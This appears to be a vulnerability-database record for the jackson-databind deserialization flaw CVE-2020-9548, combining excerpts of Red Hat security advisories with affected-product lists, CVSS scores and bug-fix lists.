tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm tfm-runtime-6.1-1.el7sat.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-3258 https://access.redhat.com/security/cve/CVE-2018-11751 https://access.redhat.com/security/cve/CVE-2019-12781 https://access.redhat.com/security/cve/CVE-2019-16782 https://access.redhat.com/security/cve/CVE-2020-5216 https://access.redhat.com/security/cve/CVE-2020-5217 https://access.redhat.com/security/cve/CVE-2020-5267 https://access.redhat.com/security/cve/CVE-2020-7238 https://access.redhat.com/security/cve/CVE-2020-7663 https://access.redhat.com/security/cve/CVE-2020-7942 https://access.redhat.com/security/cve/CVE-2020-7943 https://access.redhat.com/security/cve/CVE-2020-8161 https://access.redhat.com/security/cve/CVE-2020-8184 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-14061 https://access.redhat.com/security/cve/CVE-2020-14062 https://access.redhat.com/security/cve/CVE-2020-14195 https://access.redhat.com/security/cve/CVE-2020-14334 https://access.redhat.com/security/cve/CVE-2020-14380 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK 1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa 5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr oomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f Z8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io OhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX k9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG C2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5 /6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta D2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a f4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG 1yK/tAm1KBU=osSG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.
This release of Red Hat JBoss Enterprise Application Platform 7.3.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.3.0, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.3.1 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
cxf: reflected XSS in the services listing page (CVE-2019-17573)
-
cxf-core: cxf: OpenId Connect token service does not properly validate the clientId (CVE-2019-12423)
-
jackson-mapper-asl: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
undertow: servletPath in normalized incorrectly leading to dangerous application mapping which could result in security bypass (CVE-2020-1757)
-
jackson-databind: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
jackson-mapper-asl: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
resteasy-jaxrs: resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class (CVE-2020-1695)
-
cryptacular: excessive memory allocation during a decode operation (CVE-2020-7226)
-
smallrye-config: SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader (CVE-2020-1729)
-
resteasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack (CVE-2020-10688)
-
jackson-databind: Lacks certain xbean-reflect/JNDI blocking (CVE-2020-8840)
-
undertow: invalid HTTP request with large chunk size (CVE-2020-10719)
-
jackson-databind: Serialization gadgets in shaded-hikari-config (CVE-2020-9546)
-
jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)
-
jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)
-
undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)
-
libthrift: thrift: Endless loop when feed with specific input data (CVE-2019-0205)
-
libthrift: thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol (CVE-2019-0210)
-
wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use (CVE-2019-14887)
-
jsf-impl: Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371 (CVE-2020-6950)
-
jsf-impl: mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter (CVE-2018-14371)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1607709 - CVE-2018-14371 mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1764607 - CVE-2019-0210 thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol 1764612 - CVE-2019-0205 thrift: Endless loop when feed with specific input data 1772008 - CVE-2019-14887 wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use 1797006 - CVE-2019-12423 cxf: OpenId Connect token service does not properly validate the clientId 1797011 - CVE-2019-17573 cxf: reflected XSS in the services listing page 1801380 - CVE-2020-7226 cryptacular: excessive memory allocation during a decode operation 1802444 - CVE-2020-1729 SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader 1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-16114 - (7.3.z) Upgrade jboss-vfs to 3.2.15.Final JBEAP-18060 - GSS Upgrade weld from 3.1.2.Final-redhat-00001 to 3.1.4.Final-redhat-00001 JBEAP-18163 - (7.3.z) Upgrade HAL from 3.2.3.Final-redhat-00001 to 3.2.8.Final-redhat-00001 JBEAP-18221 - (7.3.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-00010 to 2.5.5.SP12-redhat-00012 JBEAP-18240 - (7.3.z) Update the Chinese translations in WildFly Core JBEAP-18241 - (7.3.z) Update the Japanese translations in WildFly Core JBEAP-18273 - (7.3.z) Upgrade IronJacamar from 1.4.19.Final to 1.4.20.Final JBEAP-18277 - GSS Upgrade JBoss JSF API from 3.0.0.SP01-redhat-00001 to 3.0.0.SP02-redhat-00001 JBEAP-18288 - GSS Upgrade FasterXML from 2.10.0 to 2.10.3 JBEAP-18294 - (7.3.z) Upgrade JAXB from 2.3.1 to 2.3.3-b02 and com.sun.istack from 3.0.7 to 3.0.10 JBEAP-18302 - GSS Upgrade wildfly-http-client from 1.0.18 to 1.0.20 JBEAP-18315 - GSS Upgrade Artemis from 2.9.0.redhat-00005 to 2.9.0.redhat-00010 JBEAP-18346 - GSS Upgrade jakarta.el from 3.0.2.redhat-00001 to 3.0.3.redhat-00002 JBEAP-18352 - GSS Upgrade JBoss Remoting from 5.0.16.Final-redhat-00001 to 5.0.18.Final-redhat-00001 JBEAP-18361 - GSS Upgrade Woodstox from 5.0.3 to 6.0.3 JBEAP-18367 - GSS Upgrade Hibernate ORM from 5.3.15 to 5.3.16 JBEAP-18393 - GSS Update $JBOSS_HOME/docs/schema to show https schema URL instead of http JBEAP-18397 - Tracker bug for the EAP 7.3.1 release for RHEL-6 JBEAP-18409 - GSS Upgrade Infinispan from 9.4.16.Final-redhat-00002 to 9.4.18.Final-redhat-00001 JBEAP-18527 - (7.3.z) Upgrade WildFly Naming Client from 1.0.10.Final to 1.0.12.Final JBEAP-18528 - (7.3.z) Upgrade jboss-ejb-client from 4.0.27.Final to 4.0.31.Final-redhat-00001 JBEAP-18596 - GSS Upgrade JBoss Modules from 1.9.1 to 1.10.0 JBEAP-18598 - GSS Upgrade Bouncycastle from 1.60.0-redhat-00001 to 1.60.0-redhat-00002 JBEAP-18640 - [Runtimes] (7.3.x) Upgrade slf4j-jboss-logmanager from 1.0.3.GA.redhat-2 to 1.0.4.GA.redhat-00001 JBEAP-18653 - (7.3.z) Upgrade Apache CXF from 3.3.4.redhat-00001 to 3.3.5.redhat-00001 JBEAP-18706 - (7.3.z) Upgrade elytron-web from 1.6.0.Final to 1.6.1.Final JBEAP-18770 - Upgrade Jandex to 2.1.2.Final-redhat-00001 JBEAP-18775 - (7.3.z) Upgrade WildFly Core to 10.1.4.Final-redhat-00001 JBEAP-18788 - (7.3.x) Upgrade wss4j from 2.2.4.redhat-00001 to 2.2.5.redhat-00001 JBEAP-18790 - (7.3.z) Upgrade cryptacular from 1.2.0.redhat-1 to 1.2.4.redhat-00001 JBEAP-18818 - (7.3.z) Upgrade PicketBox from 5.0.3.Final-redhat-00005 to 5.0.3.Final-redhat-00006 JBEAP-18836 - GSS Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-18850 - (7.3.z) Upgrade smallrye-config from 1.4.1 to 1.6.2 JBEAP-18870 - Upgrade WildFly Common to 1.5.2.Final.redhat-00002 JBEAP-18875 - Upgrade MicroProfile Metrics API to 2.3 and smallrye-metrics to 2.4.0 JBEAP-18876 - Upgrade Smallrye Health to 2.2.0 and MP Health API to 2.2 JBEAP-18877 - (7.3.z) Upgrade Jaeger client to 0.34.3 JBEAP-18878 - Upgrade Smallrye Opentracing to 1.3.4 and MP Opentracing to 1.3.3 JBEAP-18879 - (7.3.z) Upgrade MicroProfile Config 1.4 JBEAP-18929 - (7.3.z) Upgrade WildFly Elytron from 1.10.5.Final-redhat-00001 to 1.10.6.Final JBEAP-18990 - (7.3.z) Upgrade jasypt from 1.9.2 to 1.9.3-redhat-00001 JBEAP-18991 - (7.3.z) Upgrade opensaml from 3.3.0.redhat-1 to 3.3.1-redhat-00002 JBEAP-19035 - In Building Custom Layers, update pom.xml content for 7.3.1 JBEAP-19054 - Upgrade MP REST Client to 1.4.0.redhat-00004 JBEAP-19066 - Upgrade snakeyaml from 1.18.0.redhat-2 to 1.24.0.redhat-00001 JBEAP-19117 - GSS Upgrade org.jboss.genericjms from 2.0.2.Final-redhat-00001 to 2.0.4.Final-redhat-00001 JBEAP-19133 - GSS Upgrade JSF based on Mojarra 2.3.9.SP08-redhat-00001 to 2.3.9.SP09-redhat-00001 JBEAP-19156 - (7.3.z) Upgrade RESTEasy from 3.11.1.Final.redhat-00001 to 3.11.2.Final.redhat-00001 JBEAP-19181 - (7.3.z) Upgrade WildFly Core to 10.1.5.Final-redhat-00001 JBEAP-19192 - (7.3.z) Update the Japanese translations JBEAP-19232 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.7.Final-redhat-00001 JBEAP-19281 - (7.3.z) Upgrade undertow from 2.0.30.SP2-redhat-00001 to 2.0.30.SP3-redhat-00001 JBEAP-19456 - Upgrade wildfly-transaction-client to 1.1.11.Final
The References section of this erratum contains a download link (you must log in to download the update).
The JBoss server process must be restarted for the update to take effect
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "9.5"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "7.3"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.8.11.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.8.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.7.9.7"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9548"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158037"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
}
],
"trust": 1.5
},
"cve": "CVE-2020-9548",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-9548",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-187673",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-9548",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-9548",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-040",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-187673",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-9548",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187673"
},
{
"db": "VULMON",
"id": "CVE-2020-9548"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
},
{
"db": "NVD",
"id": "CVE-2020-9548"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. An attacker could exploit this vulnerability to execute arbitrary code with a specially crafted request. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Satellite 6.8 release\nAdvisory ID: RHSA-2020:4366-01\nProduct: Red Hat Satellite 6\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4366\nIssue date: 2020-10-27\nCVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781\n CVE-2019-16782 CVE-2020-5216 CVE-2020-5217\n CVE-2020-5267 CVE-2020-7238 CVE-2020-7663\n CVE-2020-7942 CVE-2020-7943 CVE-2020-8161\n CVE-2020-8184 CVE-2020-8840 CVE-2020-9546\n CVE-2020-9547 CVE-2020-9548 CVE-2020-10693\n CVE-2020-10968 CVE-2020-10969 CVE-2020-11619\n CVE-2020-14061 CVE-2020-14062 CVE-2020-14195\n CVE-2020-14334 CVE-2020-14380\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Satellite 6.8 for RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Satellite 6.7 - noarch, x86_64\nRed Hat Satellite Capsule 6.8 - noarch, x86_64\n\n3. Description:\n\nRed Hat Satellite is a systems management tool for Linux-based\ninfrastructure. It allows for provisioning, remote management, and\nmonitoring of multiple Linux deployments with a single centralized tool. \n\nSecurity Fix(es):\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n* rubygem-websocket-extensions: ReDoS vulnerability in\nSec-WebSocket-Extensions parser (CVE-2020-7663)\n* puppet: puppet server and puppetDB may leak sensitive information via\nmetrics API (CVE-2020-7943)\n* jackson-databind: multiple serialization gadgets (CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)\n* foreman: unauthorized cache read on RPM-based installations through local\nuser (CVE-2020-14334)\n* Satellite: Local user impersonation by Single sign-on (SSO) user leads to\naccount takeover (CVE-2020-14380)\n* Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n(CVE-2019-12781)\n* rubygem-rack: hijack sessions by using timing attacks targeting the\nsession id (CVE-2019-16782)\n* rubygem-secure_headers: limited header injection when using dynamic\noverrides with user input (CVE-2020-5216)\n* rubygem-secure_headers: directive injection when using dynamic overrides\nwith user input (CVE-2020-5217)\n* rubygem-actionview: views that use the `j` or `escape_javascript` methods\nare susceptible to XSS attacks (CVE-2020-5267)\n* puppet: Arbitrary catalog retrieval (CVE-2020-7942)\n* rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)\n* rubygem-rack: percent-encoded cookies can be used to overwrite existing\nprefixed cookie names (CVE-2020-8184)\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n* puppet-agent: Puppet Agent does not properly verify SSL connection when\ndownloading a CRL (CVE-2018-11751)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\n* Provides the Satellite Ansible Modules that allow for full automation of\nyour Satellite configuration and deployment. \n\n* Adds ability to install Satellite and Capsules and manage hosts in a IPv6\nnetwork environment\n\n* Ansible based Capsule Upgrade automation: Ability to centrally upgrade\nall of your Capsule servers with a single job execution. \n\n* Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest\nversion of Puppet\n\n* Support for HTTP UEFI provisioning\n\n* Support for CAC card authentication with Keycloak integration\n\n* Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8\nusing the LEAPP based tooling. \n\n* Support for Red Hat Enterprise Linux Traces integration\n\n* satellite-maintain \u0026 foreman-maintain are now self updating\n\n* Notifications in the UI to warn users when subscriptions are expiring. \n\nThe items above are not a complete list of changes. This update also fixes\nseveral bugs and adds various enhancements. Documentation for these changes\nis available from the Release Notes document linked to in the References\nsection. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1160344 - [RFE] Satellite support for cname as alternate cname for satellite server\n1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems\n1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy\n1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt\n1398317 - For the vms built by Satellite 6 using \"Network Based\" installation mode on VMWare, unable to change the boot sequence via BIOS\n1410616 - [RFE] Prominent notification of expiring subscriptions. \n1410916 - Should only be able to add repositories you have access to\n1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3\n1461781 - [RFE]A button should be available in the GUI to clear the recurring logics. \n1469267 - need updated rubygem-rake\n1486446 - Content view versions list has slow query for package count\n1486696 - \u0027hammer host update\u0027 removes existing host parameters\n1494180 - Sorting by network address for subnet doesn\u0027t work properly\n1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost\n1503037 - [RFE] Cancelled future/recurring job invocations should not get the status \"failed\" but rather \"cancelled\"\n1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for \"172.17.0.101\"\n1531674 - Operating System Templates are ordered inconsistently in UI. \n1537320 - [RFE] Support for Capsules at 1 version lower than Satellite\n1543316 - Satellite 6.2 